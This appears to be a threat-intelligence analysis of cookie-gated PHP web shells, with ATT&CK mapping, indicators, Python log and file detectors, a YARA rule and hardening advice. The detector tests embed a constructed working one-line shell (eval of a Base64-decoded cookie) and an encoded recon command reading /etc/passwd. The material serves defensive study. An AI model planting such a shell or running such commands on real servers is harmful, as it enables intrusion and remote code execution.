Full Report
Threat actors are increasingly using HTTP cookies as a control channel for PHP-based web shells on Linux servers and to achieve remote code execution, according to findings from the Microsoft Defender Security Research Team. "Instead of exposing command execution through URL parameters or request bodies, these web shells rely on threat actor-supplied cookie values to gate execution,
Analysis Summary
# Tool/Technique: Cookie-Based PHP Web Shells
## Overview
This technique involves PHP-based web shells that use the HTTP `Cookie` header as a hidden control channel. By moving the command-execution trigger out of the URL query string and POST body, which WAF rules and log-based detections concentrate on, and into the `Cookie` header, threat actors sidestep many existing filters and keep their commands out of default web server access logs.
## Technical Details
- **Type**: Technique / Malware (Web Shell)
- **Platform**: Linux web servers (as reported); the technique itself works on any host running PHP, including Windows.
- **Capabilities**: Remote Code Execution (RCE), command delivery that is absent from default access logs, conditional (cookie-gated) execution, and persistence.
- **First Seen**: The excerpt gives no date; the Microsoft Defender Security Research Team reports the technique as increasingly common.
## MITRE ATT&CK Mapping
- **TA0003 - Persistence**
- T1505.003 - Server Software Component: Web Shell
- **TA0002 - Execution**
- T1059.004 - Command and Scripting Interpreter: Unix Shell (commands run through `system()`, `shell_exec()` and similar sinks)
- **TA0005 - Defense Evasion**
- T1027 - Obfuscated Files or Information (Base64-encoded or encrypted cookie payloads)
- **TA0011 - Command and Control**
- T1071.001 - Application Layer Protocol: Web Protocols (commands carried in the HTTP `Cookie` header)
## Functionality
### Core Capabilities
- **Gated Execution**: The web shell checks for a specific, actor-defined cookie name (and often a specific value or key inside it) before executing anything. Without the cookie the script behaves like an ordinary page, for example returning a 404 or an empty 200 OK, and never touches the input, so casual browsing or scanning of the file reveals nothing.
- **Remote Code Execution (RCE)**: The cookie value is handed to a PHP execution sink such as `eval()`, `system()`, `shell_exec()`, `passthru()`, `exec()` or `proc_open()`. Older shells also used `assert()` with a string argument; that no longer evaluates code as of PHP 8.0.
- **Parameter Obfuscation**: The payload is usually Base64-encoded or encrypted inside the cookie value, so the shell needs only a single decode call (typically `base64_decode()`) before reaching the sink, and the raw command stays out of any cookie that does get logged.
### Advanced Features
- **Stealth Logging**: Apache's `combined` LogFormat and Nginx's default `combined` format record the request line, status, Referer and User-Agent but not the `Cookie` header, so commands sent through the cookie leave no trace in standard access logs. Cookies are only captured if an operator adds `%{Cookie}i` (Apache) or `$http_cookie` (Nginx) to the log format.
- **Polymorphism/Variability**: The required cookie name (e.g., `SessionID` vs `AdminToken`), the encoding wrapper and the sink can be changed per deployment, which defeats signatures written for one specific sample.
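The log-side check described under Stealth Logging, which also serves the Log Analysis and Network Indicators bullets below, as an added example that is not part of the Microsoft report or of any web shell. It assumes the operator has added the Cookie header to Apache's combined format, e.g. `LogFormat "%h %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-Agent}i\" \"%{Cookie}i\"" combined_cookie` (Nginx can log `$http_cookie` the same way). The access-log lines, IPs, timestamps and the encoded command are constructed for the demonstration, and the length and entropy thresholds are starting points to tune per application:

```python
"""Spot encoded commands in logged Cookie headers.

Added example, not part of the Microsoft report. Expects access-log lines
in Apache's combined format followed by one extra quoted field holding
the Cookie header. Flags cookie values that are both long and
high-entropy, and reports how much the Cookie header length swings per
client/path pair (a real session cookie has a fixed length).
"""
import base64
import math
import re
from collections import Counter

# combined format + trailing quoted Cookie header
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" '
    r'"(?P<ua>[^"]*)" "(?P<cookie>[^"]*)"$'
)


def parse_line(line: str):
    """Return the named fields of one log line (plus 'path'), or None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    fields = m.groupdict()
    parts = fields["req"].split(" ")
    fields["path"] = parts[1] if len(parts) >= 2 else fields["req"]
    return fields


def shannon_entropy(s: str) -> float:
    """Bits per character: hex tokens top out at 4, random Base64 nears 6."""
    if not s:
        return 0.0
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())


def cookie_pairs(header: str):
    """Yield (name, value) from a header like 'a=1; b=2'."""
    for part in header.split(";"):
        name, _, value = part.strip().partition("=")
        if name:
            yield name, value


def suspicious_cookies(lines, max_len: int = 64, min_entropy: float = 3.5) -> list:
    """Cookies longer than a session token whose entropy exceeds a hex token's."""
    hits = []
    for line in lines:
        f = parse_line(line)
        if f is None:
            continue
        for name, value in cookie_pairs(f["cookie"]):
            if len(value) > max_len and shannon_entropy(value) > min_entropy:
                hits.append((f["ip"], f["path"], name, len(value)))
    return hits


def cookie_size_spread(lines) -> dict:
    """(ip, path) -> (shortest, longest) Cookie header length seen."""
    spread = {}
    for line in lines:
        f = parse_line(line)
        if f is None:
            continue
        key, n = (f["ip"], f["path"]), len(f["cookie"])
        lo, hi = spread.get(key, (n, n))
        spread[key] = (min(lo, n), max(hi, n))
    return spread


# Constructed data: a command Base64-encoded the way an actor would send it,
# and three log lines using documentation IP ranges and invented timestamps.
COMMAND = "id;uname -a;cat /etc/passwd;ls -la /var/www/html;netstat -tulpn"
PAYLOAD = base64.b64encode(COMMAND.encode()).decode()
LOG = [
    '203.0.113.7 - - [10/Mar/2025:09:14:02 +0000] "GET /healthcheck.php HTTP/1.1" '
    '200 12 "-" "Mozilla/5.0" "PHPSESSID=3f9a1c2e7b8d4f6a0c1e2d3b4a5f6e7d"',
    '203.0.113.7 - - [10/Mar/2025:09:14:05 +0000] "GET /healthcheck.php HTTP/1.1" '
    '200 512 "-" "Mozilla/5.0" "SessionID=' + PAYLOAD + '"',
    '198.51.100.4 - - [10/Mar/2025:09:15:11 +0000] "GET /index.php HTTP/1.1" '
    '200 2048 "-" "Mozilla/5.0" "theme=dark; PHPSESSID=9b8c7d6e5f4a3b2c1d0e9f8a7b6c5d4e"',
]

if __name__ == "__main__":
    for hit in suspicious_cookies(LOG):
        print("suspicious cookie:", hit)
    for key, (lo, hi) in cookie_size_spread(LOG).items():
        print("cookie header length range", key, lo, hi)
```

The second line is the one a responder wants: the same client hits the same file seconds apart, first with a 32-character session ID and then with an 84-character Base64 blob under a different cookie name. Tune `max_len` to the longest legitimate cookie the application issues before deploying this over real logs.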
## Indicators of Compromise
- **File Hashes**: *(Specific hashes vary by deployment; monitor for small PHP files containing `eval($_COOKIE[...])`)*
- **File Names**: Often masquerade as legitimate files: `index.php`, `wp-login.php`, `config.php`, `healthcheck.php`.
- **Registry Keys**: N/A (Linux focus).
- **Network Indicators**: Repeated requests to a single PHP file from one source IP where the `Cookie` header length varies widely between requests; a genuine session cookie has a fixed length, an encoded command does not.
- **Behavioral Indicators**:
- `www-data` or `apache` user accounts spawning shell processes (`/bin/sh`, `/bin/bash`).
- PHP processes initiating outbound network connections.
- Unexpected file modifications in the web root directory.
## Associated Threat Actors
- The Microsoft summary names no specific groups. Cookie-gated shells are a variation on a primitive used by many actors, so the technique alone is not a basis for attribution.
## Detection Methods
- **Signature-based detection**: Scan PHP files for `$_COOKIE` reads in the same file as an execution sink (`eval()`, `system()`, `shell_exec()`, `passthru()`, `exec()`, `proc_open()`) and a decoder such as `base64_decode()` or `str_rot13()`. Legitimate code reads cookies too, so treat matches as triage candidates and review the data flow from cookie to sink.
- **Behavioral detection**: Monitor for children of the web server process (`httpd`, `apache2`, `php-fpm`) such as `sh -c` running discovery commands (`whoami`, `id`, `ls`, `cat /etc/passwd`); auditd `execve` rules or EDR process telemetry keyed on the `www-data`/`apache` user provide this.
- **Log Analysis**: Where the `Cookie` header is logged, look for unusually long or high-entropy cookie values and for cookie lengths that vary across requests from one client to one file.
- **YARA Rule Snippet** (a triage aid: it also matches benign files that read cookies and call a sink somewhere, so confirm the cookie-to-sink data flow by hand):

```yara
rule PHP_Cookie_Webshell
{
    meta:
        description = "PHP source reading $_COOKIE in a file that also calls an execution sink"
    strings:
        $php = "<?php"
        // cookie read with a quoted or bare key
        $cookie = /\$_COOKIE\s*\[['"]?[a-zA-Z0-9_-]+['"]?\]/
        // sink must be called (name followed by a parenthesis), not merely mentioned
        $exec = /\b(eval|assert|system|shell_exec|passthru|exec|popen|proc_open)\s*\(/
    condition:
        filesize < 200KB and $php and $cookie and $exec
}
```
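The same check as the YARA rule, written in Python so it can be run over a web root during incident response, and exercised against the gated-execution behaviour described under Core Capabilities; this is an added example, not code from the Microsoft report or from any web shell. The function names, the 200 KB size limit and the three PHP samples are constructed for the demonstration:

```python
"""Static triage of PHP files for cookie-gated execution.

Added example, not from the Microsoft report or any real web shell. It
requires a PHP open tag, a $_COOKIE read and an execution sink that is
actually called (name followed by an opening parenthesis), so the word
"system" in a comment or string does not match. Decoders are reported as
supporting evidence only.
"""
import os
import re

# A read of the $_COOKIE superglobal with a quoted or bare key.
COOKIE_RE = re.compile(r"\$_COOKIE\s*\[\s*['\"]?[A-Za-z0-9_-]+['\"]?\s*\]")
# Execution sinks; eval is a language construct, the rest are functions.
EXEC_RE = re.compile(
    r"\b(eval|assert|system|shell_exec|passthru|exec|popen|proc_open)\s*\(")
# Decoders that usually sit between the cookie and the sink.
DECODE_RE = re.compile(
    r"\b(base64_decode|str_rot13|gzinflate|gzuncompress|hex2bin)\s*\(")


def score_php(source: str) -> dict:
    """Classify one PHP source string; 'suspicious' mirrors the YARA condition."""
    has_php = "<?php" in source or "<?=" in source
    cookie_reads = COOKIE_RE.findall(source)
    sinks = EXEC_RE.findall(source)
    decoders = DECODE_RE.findall(source)
    return {
        "php": has_php,
        "cookie_reads": cookie_reads,
        "sinks": sinks,
        "decoders": decoders,
        "suspicious": has_php and bool(cookie_reads) and bool(sinks),
    }


def scan_tree(root: str, size_limit: int = 200 * 1024) -> list:
    """Walk a directory such as /var/www/html and return (path, result)
    for every .php file under the size limit that scores as suspicious."""
    findings = []
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            if not name.endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            if os.path.getsize(path) > size_limit:
                continue  # one-line shells are small; review big files separately
            with open(path, encoding="utf-8", errors="replace") as fh:
                result = score_php(fh.read())
            if result["suspicious"]:
                findings.append((path, result))
    return findings


# Constructed samples for the demonstration, not real-world files.
GATED_SHELL = """<?php
// Responds like a missing page unless the actor's cookie is present.
if (!isset($_COOKIE['SessionID'])) { http_response_code(404); exit; }
@eval(base64_decode($_COOKIE['SessionID']));
"""
BENIGN_COOKIE_USE = """<?php
// Ordinary cookie use: selects a theme, executes nothing.
$theme = isset($_COOKIE['theme']) ? $_COOKIE['theme'] : 'default';
echo htmlspecialchars($theme);
"""
PROSE_ONLY = """<?php
// "the system should eval user feedback" is text, not a sink call
echo 'ok';
"""

if __name__ == "__main__":
    for label, src in (("gated shell", GATED_SHELL),
                       ("benign cookie use", BENIGN_COOKIE_USE),
                       ("prose only", PROSE_ONLY)):
        print(label, score_php(src))
```

Only the gated shell scores as suspicious: the benign file reads cookies but calls no sink, and the prose-only file mentions sink names without calling them. Run `scan_tree("/var/www/html")` on a suspect host and review each finding's cookie-to-sink flow before acting on it.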
## Mitigation Strategies
- **Prevention measures**: Implement strict file upload controls (server-side type checks, uploads stored outside the web root or in a directory where PHP execution is disabled) and restrict high-risk PHP functions in `php.ini` via `disable_functions` (e.g., `system`, `shell_exec`, `exec`, `passthru`, `popen`, `proc_open`). Note that `eval` is a language construct, not a function, and cannot be disabled this way; a shell built on `eval()` still runs, which is why file integrity and behavioral detection remain necessary.
- **Hardening recommendations**:
- Mount web directories as read-only where possible.
- Use File Integrity Monitoring (FIM) to alert on changes to PHP files.
- Configure Web Application Firewalls (WAF) to inspect `Cookie` headers, decoding Base64 values before pattern matching, and to alert on cookie values far longer than the application's own session tokens.
## Related Tools/Techniques
- **China Chopper**: A classic one-line web shell (`eval` of a POST parameter); the cookie-gated variant moves the same primitive from the request body into the `Cookie` header.
- **In-Memory Web Shells**: Web shells that reside only in the memory of the web server process and leave no file on disk.
- **Header-based command delivery**: The same trick using other request headers such as `User-Agent` or `Referer`. Both of those are recorded by the default `combined` log format, so they are less stealthy than the cookie variant.